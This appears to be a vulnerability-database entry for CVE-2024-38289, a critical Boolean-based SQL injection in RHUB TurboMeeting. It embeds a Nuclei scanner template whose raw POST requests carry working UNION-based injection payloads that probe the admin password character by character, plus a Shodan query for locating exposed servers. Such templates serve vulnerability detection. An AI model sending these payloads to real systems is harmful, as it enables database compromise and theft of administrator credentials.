CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
79.6%
A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
id: CVE-2024-38289
info:
name: TurboMeeting - Boolean-based SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
reference:
- https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v
metadata:
verified: true
max-request: 2
shodan-query: html:"TurboMeeting"
tags: cve,cve2024,sqli,turbomeeting
http:
- raw:
- |
POST /as/wapi/vmp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
- |
POST /as/wapi/vmp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '<__Status__>SUCCEED</__Status__>'
- type: word
part: body_2
words:
- '<__Status__>FAILED</__Status__>'
# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
79.6%